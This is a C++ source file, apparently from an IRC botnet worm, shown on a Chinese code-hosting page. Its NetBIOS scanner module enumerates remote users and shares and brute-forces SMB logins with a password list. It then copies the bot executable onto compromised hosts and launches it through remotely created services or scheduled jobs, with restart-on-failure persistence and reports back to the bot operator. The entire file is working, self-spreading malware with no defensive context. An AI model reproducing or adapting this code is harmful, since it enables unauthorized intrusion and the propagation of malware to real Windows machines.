📄 nbscanner.cpp.svn-base
字号:
int pwd_count=0; while(pwds[pwd_count] && !bExploited)
{ if(AuthSession((*iUsers)->sName.CStr(), pwds[pwd_count]) && !bExploited)
{ bExploited=Exploit((*iShares)->sName.CStr(), m_sSocket.m_szHost, (*iUsers)->sName.CStr(), pwds[pwd_count]);
CloseSession(); }
pwd_count++; }
iUsers++; }
iShares++; iUsers=m_lUsers.begin(); }
for(iUsers=m_lUsers.begin(); iUsers!=m_lUsers.end(); ++iUsers) delete (*iUsers);
for(iShares=m_lShares.begin(); iShares!=m_lShares.end(); ++iShares) delete (*iShares);
m_lUsers.clear(); m_lShares.clear();
return bExploited;
}
bool CScannerNetBios::NullSession()
{ memset(&m_UseInfo, 0, sizeof(m_UseInfo));
m_UseInfo.ui2_local=NULL;
m_UseInfo.ui2_remote=(unsigned short*)m_wszResource;
m_UseInfo.ui2_password=L"";
m_UseInfo.ui2_username=L"";
m_UseInfo.ui2_domainname=L"";
m_UseInfo.ui2_asg_type=USE_IPC;
m_NetApiStatus=NetUseAdd(NULL, 2, (LPBYTE)&m_UseInfo, NULL);
if(m_NetApiStatus==ERROR_SESSION_CREDENTIAL_CONFLICT) return true;
if(m_NetApiStatus==NERR_Success) return true; else return false; }
bool CScannerNetBios::AuthSession(const char *user, const char *password)
{ memset(&m_UseInfo, 0, sizeof(m_UseInfo));
m_UseInfo.ui2_local=NULL;
WCHAR wszUser[256], wszPassword[256];
mbstowcs(wszUser, user, lenof(wszUser));
mbstowcs(wszPassword, password, lenof(wszPassword));
m_UseInfo.ui2_remote=m_wszResource;
m_UseInfo.ui2_password=wszPassword;
m_UseInfo.ui2_username=wszUser;
m_UseInfo.ui2_domainname=L"";
m_NetApiStatus=NetUseAdd(NULL, 2, (LPBYTE)&m_UseInfo, NULL);
if(m_NetApiStatus==ERROR_SESSION_CREDENTIAL_CONFLICT) return true;
if(m_NetApiStatus==NERR_Success) return true; else return false;
}
bool CScannerNetBios::CloseSession()
{ m_NetApiStatus=NetUseDel(NULL, m_wszResource, USE_LOTS_OF_FORCE);
if(m_NetApiStatus==NERR_Success) return true; else return false; }
bool CScannerNetBios::GetShares(list<shareinfo*> *lpShares)
{ DWORD dwEntriesRead=0, dwTotalEntries=0;
m_NetApiStatus=NetShareEnum(m_wszServer, 1, (LPBYTE*)&m_ShareInfo, MAX_PREFERRED_LENGTH, &dwEntriesRead, &dwTotalEntries, NULL);
if(m_NetApiStatus!=NERR_Success) return false;
SHARE_INFO_1* l_ShareInfo=m_ShareInfo;
for(int x=0; x<(int)dwTotalEntries; x++)
{ shareinfo *pShare=new shareinfo;
wcstombs(pShare->sName.GetBuffer(256), (const wchar_t*)l_ShareInfo->shi1_netname, 256);
wcstombs(pShare->sRemark.GetBuffer(256), (const wchar_t*)l_ShareInfo->shi1_remark, 256);
if(stricmp(pShare->sName.CStr(), "ipc$")) lpShares->push_back(pShare); l_ShareInfo++; }
if(m_ShareInfo!=0) NetApiBufferFree(m_ShareInfo);
return true; }
bool CScannerNetBios::GetUsers(list<userinfo*> *lpUsers)
{ DWORD dwEntriesRead=0, dwRemaining=0, dwResume=0, dwRC; do
{ dwRC=NetUserEnum(m_wszServer, 1, 0, (LPBYTE*)&m_UserInfo, MAX_PREFERRED_LENGTH, &dwEntriesRead, &dwRemaining, &dwResume);
if(dwRC!=ERROR_MORE_DATA && dwRC!=ERROR_SUCCESS) break;
USER_INFO_1 *l_UserInfo=m_UserInfo;
for(int x=0; x<(int)dwEntriesRead; x++)
{ userinfo *pUser=new userinfo;
wcstombs(pUser->sName.GetBuffer(256), l_UserInfo->usri1_name, 256);
wcstombs(pUser->sServer.GetBuffer(256), m_wszHost, 256);
lpUsers->push_back(pUser); l_UserInfo++; }
if(m_UserInfo!=0) NetApiBufferFree(m_UserInfo); }
while(dwRC==ERROR_MORE_DATA);
if(dwRC!=ERROR_SUCCESS) return false; return true; }
bool CScannerNetBios::Exploit(const char *share, const char *host, const char *user, const char *password)
{ char buffer[MAX_PATH]; sprintf(buffer, "\\\\%s\\%s\\testfile", host, share);
FILE *fp=fopen(buffer, "w+"); if(fp)
{ fclose(fp);
if (g_pMainCtrl->m_cBot.scaninfo_level.iValue >= 3)
{
SendLocal("%s: Exploiting \\\\%s\\%s with l/p: %s/%s", m_sScannerName.CStr(), host, share, user, password);
}
if(StartViaCreateService(share, host, user, password)) return true;
else if(StartViaNetScheduleJobAdd(share, host, user, password)) return true;
else return false; }
else return false; }
bool CScannerNetBios::StartViaNetScheduleJobAdd(const char *share, const char *host, const char *user, const char *password)
{ char buffer[MAX_PATH]; CString sReply; LPTIME_OF_DAY_INFO pTOD=NULL; AT_INFO at; DWORD dwJobId;
GetFilename(buffer, MAX_PATH);
char rem_buffer[MAX_PATH]; sprintf(rem_buffer, "\\\\%s\\%s\\%s", host, share, g_pMainCtrl->m_cBot.bot_filename.sValue.CStr());
unsigned long lTimeoutStart=GetTickCount();
while(CopyFile(buffer, rem_buffer, false)==false && GetTickCount()-lTimeoutStart<100000) Sleep(100);
m_NetApiStatus=NetRemoteTOD(m_wszHost, (LPBYTE*)&pTOD);
if(m_NetApiStatus==NERR_Success)
{ wchar_t wszBotRemote[MAX_PATH]; wchar_t wszFilename[MAX_PATH];
wcscpy(wszBotRemote, m_wszResource);
mbstowcs(wszFilename, g_pMainCtrl->m_cBot.bot_filename.sValue.CStr(), lenof(wszFilename));
wcscat(wszBotRemote, L"\\");
wcscat(wszBotRemote, wszFilename);
memset(&at, 0, sizeof(at)); at.Command=&wszBotRemote[0];
unsigned long lMsecs=(pTOD->tod_hunds*10); lMsecs+=(pTOD->tod_secs*1000);
lMsecs+=((pTOD->tod_mins*60)*1000); lMsecs+=(((pTOD->tod_hours*60)*60)*1000);
lMsecs+=60000; // 60 minute offset
at.DaysOfMonth=0; at.DaysOfWeek=0; at.JobTime=lMsecs;
m_NetApiStatus=NetScheduleJobAdd(m_wszHost, (LPBYTE)&at, &dwJobId);
if(m_NetApiStatus==NERR_Success) {
if (g_pMainCtrl->m_cBot.scaninfo_level.iValue >= 2)
{
SendLocal("%s: Exploited \\\\%s\\%s (NetScheduleJobAdd)!!!", m_sScannerName.CStr(), host, share);
}
return true; }
else return false; }
else return false; }
bool CScannerNetBios::StartViaCreateService(const char *share, const char *host, const char *user, const char *password)
{ bool bRetVal=false; char buffer[MAX_PATH]; SC_HANDLE hServiceControl=OpenSCManager(host, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
if(!hServiceControl) return false; char szBotRemote[MAX_PATH]; CString sTempPath;
GetFilename(buffer, MAX_PATH);
sprintf(szBotRemote, "\\\\%s\\%s\\%s", host, share, g_pMainCtrl->m_cBot.bot_filename.sValue.CStr());
long lTimeoutStart=GetTickCount();
while(CopyFile(buffer, szBotRemote, false)==false && GetTickCount()-lTimeoutStart<100000) Sleep(100);
CString rndSvcName=g_pMainCtrl->m_sTmpSvcName.CStr();
CString sSvcCmd; sSvcCmd.Format("\"%s\" -service", szBotRemote);
SC_HANDLE hService=CreateService(hServiceControl, rndSvcName,
rndSvcName, SERVICE_ALL_ACCESS, \
SERVICE_WIN32_SHARE_PROCESS, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL, \
sSvcCmd.CStr(), NULL, NULL, NULL, NULL, NULL);
/*
if(!hService) {
DWORD dwError=GetLastError();
if(dwError==ERROR_SERVICE_EXISTS) {
hService=OpenService(hServiceControl, rndSvcName, SERVICE_ALL_ACCESS);
if(!hService) { CloseServiceHandle(hServiceControl); return false; }
SERVICE_STATUS sStatus; ControlService(hService, SERVICE_CONTROL_STOP, &sStatus);
DeleteService(hService); CloseServiceHandle(hService); CloseServiceHandle(hServiceControl);
return StartViaCreateService(share, host, user, password);
}
}
*/
SERVICE_STATUS ssStatus;
StartService(hService, 0, NULL);
Sleep(5000);
DeleteService(hService);
bRetVal=true;
hService=OpenService(hServiceControl, g_pMainCtrl->m_cBot.as_service_name.sValue.CStr(), SERVICE_ALL_ACCESS);
StartService(hService, 0, NULL);
SC_ACTION scActions[1]; scActions[0].Delay=1; scActions[0].Type=SC_ACTION_RESTART;
SERVICE_FAILURE_ACTIONS sfActions; sfActions.dwResetPeriod=5; sfActions.lpRebootMsg=NULL;
sfActions.lpCommand=NULL; sfActions.cActions=1; sfActions.lpsaActions=scActions;
ChangeServiceConfig2(hService, SERVICE_CONFIG_FAILURE_ACTIONS, &sfActions);
if(hService) CloseServiceHandle(hService);
if(hServiceControl) CloseServiceHandle(hServiceControl);
if(bRetVal)
{
if (g_pMainCtrl->m_cBot.scaninfo_level.iValue >= 2)
{
SendLocal("%s: Exploited %s\\%s (CreateService)", m_sScannerName.CStr(), host, share);
}
}
return bRetVal; }
REGSCANNER(NetBios_139, NetBios, 139, true, false)
REGSCANNER(NetBios_445, NetBios, 445, true, false)
#endif // WIN32
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -